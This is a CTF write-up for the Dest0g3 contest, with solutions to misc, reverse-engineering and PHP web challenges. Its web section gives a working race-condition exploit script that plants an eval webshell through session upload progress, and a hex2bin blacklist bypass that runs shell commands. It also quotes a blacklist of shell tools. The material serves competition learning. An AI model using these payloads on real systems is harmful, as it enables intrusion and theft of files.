Dest0g3 520 Welcome Competition

Warning
This article was last updated on 2023-01-29; its content may be out of date.

misc

Welcome to fxxking DestCTF

Follow the official WeChat account.

Pngenius

zsteg solves it in one pass.

Use binwalk to split out the archive; the password is Weak_Pas5w0rd

EasyEncode

An archive; brute-force the password.

The content is then nested Morse, hex, Unicode and base64 encoding.

CyberChef decodes it in one pass.

RE

simpleXOR

Extract result_0.

Then XOR each value with 247 and subtract i.

result = [179,145,130,128,195,155,206,117,207,156,154,133,133,205,184,132,170,125,189,187,177,181,150,113,141,158,134,191,115,168,163,156,131,101,158,87]

# Undo the transform: XOR with 247 first, then subtract the index
for i in range(len(result)):
    print(chr((result[i] ^ 247) - i), end='')

Dest0g3{0bcgf-AdMy892-KobPW-hB6LTqG}

WEB

phpdest

The target instance took half an hour to start and I still could not get in.

Then I spent another half hour starting it.

<?php
highlight_file(__FILE__);
require_once 'flag.php';
if(isset($_GET['file'])) {
    require_once($_GET['file']);
}

This is the original challenge from WMCTF 2020.

File upload plus a race condition; straight to the script.

import io
import threading

import requests

url = "http://60bc6809-4970-417b-93c2-c2f9abe7c6d7.node4.buuoj.cn:81/"
sessionID = "flag"
data = {"cmd": "system('cat flag.php');"}


def write(session):
    # Keep uploading so that PHP writes the upload progress into /tmp/sess_<sessionID>
    while event.is_set():
        f = io.BytesIO(b'a' * 1024 * 50)
        session.post(url=url, data={'PHP_SESSION_UPLOAD_PROGRESS': '<?php eval($_POST["cmd"]);?>'}, files={'file': ('flag.txt', f)}, cookies={'PHPSESSID': sessionID})


def read(session):
    # Include the session file while it still exists
    while event.is_set():
        resp = session.post(url=url + '?file=/tmp/sess_flag', data=data)
        if 'flag.txt' in resp.text:
            print(resp.text)
            event.clear()  # stop every worker once the include succeeded
        else:
            print("=========retry==========")


if __name__ == "__main__":
    event = threading.Event()
    event.set()  # must be set before the workers start, they loop while it is set
    with requests.session() as session:
        threads = [threading.Thread(target=write, args=(session,)) for i in range(1, 5)]
        threads += [threading.Thread(target=read, args=(session,)) for i in range(1, 5)]
        for t in threads:
            t.start()
        for t in threads:
            t.join()

EasyPHP

<?php
highlight_file(__FILE__);
include "fl4g.php";
$dest0g3 = $_POST['ctf'];
$time = date("H");
$timme = date("d");
$timmme = date("i");
if(($time > "24") or ($timme > "31") or ($timmme > "60")){
    echo $fl4g;
}else{
    echo "Try harder!";
}
set_error_handler(
    function() use(&$fl4g) {
        print $fl4g;
    }
);
$fl4g .= $dest0g3;
?>

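The flag is echoed through the error handler.

POSTing an array is enough: appending an array to the string $fl4g raises an "Array to string conversion" error, which invokes the handler that prints $fl4g.
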
ctf[]=1000

SimpleRCE

<?php
highlight_file(__FILE__);
$aaa=$_POST['aaa'];
$black_list=array('^','.','`','>','<','=','"','preg','&','|','%0','popen','char','decode','html','md5','{','}','post','get','file','ascii','eval','replace','assert','exec','$','include','var','pastre','print','tail','sed','pcre','flag','scan','decode','system','func','diff','ini_','passthru','pcntl','proc_open','+','cat','tac','more','sort','log','current','\\','cut','bash','nl','wget','vi','grep');
$aaa = str_ireplace($black_list,"hacker",$aaa);
eval($aaa);
?>

Bypass the filter.

Use hex2bin to build the string system, which gets around the blacklist.

The flag turns out to be in the root directory.

Print it with head.

aaa=hex2bin('73797374656d')('head /*');
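
Added example (not part of the original write-up): a Python model of the challenge's str_ireplace filter, showing that the request body above passes through unchanged because the function name only exists after hex2bin is evaluated, while the same blacklist does match once the literal is resolved. The helper names and the regular expression for hex2bin literals are assumptions made for this example.

```python
import re

# Blacklist copied verbatim from the SimpleRCE source on this page.
BLACK_LIST = [
    '^', '.', '`', '>', '<', '=', '"', 'preg', '&', '|', '%0', 'popen', 'char',
    'decode', 'html', 'md5', '{', '}', 'post', 'get', 'file', 'ascii', 'eval',
    'replace', 'assert', 'exec', '$', 'include', 'var', 'pastre', 'print',
    'tail', 'sed', 'pcre', 'flag', 'scan', 'decode', 'system', 'func', 'diff',
    'ini_', 'passthru', 'pcntl', 'proc_open', '+', 'cat', 'tac', 'more', 'sort',
    'log', 'current', '\\', 'cut', 'bash', 'nl', 'wget', 'vi', 'grep',
]

# The request body value shown on this page.
PAYLOAD = "hex2bin('73797374656d')('head /*');"

# Assumption of this example: only single-quoted hex literals are resolved.
HEX2BIN_CALL = re.compile(r"hex2bin\(\s*'((?:[0-9a-fA-F]{2})+)'\s*\)")


def str_ireplace(needles, replacement, subject):
    """Model PHP str_ireplace() with an array of needles: every needle is
    replaced case-insensitively, each pass working on the previous result."""
    for needle in needles:
        subject = re.sub(re.escape(needle), lambda _m: replacement,
                         subject, flags=re.IGNORECASE)
    return subject


def resolve_hex2bin(code):
    """Replace each hex2bin('<hex>') call with the string it evaluates to."""
    return HEX2BIN_CALL.sub(
        lambda m: bytes.fromhex(m.group(1)).decode("latin-1"), code)


def blacklist_hits(text):
    """Return the blacklist entries that occur in text, ignoring case."""
    lowered = text.lower()
    return [word for word in dict.fromkeys(BLACK_LIST) if word in lowered]


if __name__ == "__main__":
    # The filter compares source text, so the payload is left untouched ...
    print(str_ireplace(BLACK_LIST, "hacker", PAYLOAD))
    # ... although the name it evaluates to is on the blacklist.
    resolved = resolve_hex2bin(PAYLOAD)
    print(resolved, blacklist_hits(resolved))
```

A substring blacklist applied before eval cannot see values that are computed at run time, so the durable fix is to stop passing request data to eval rather than to lengthen the list.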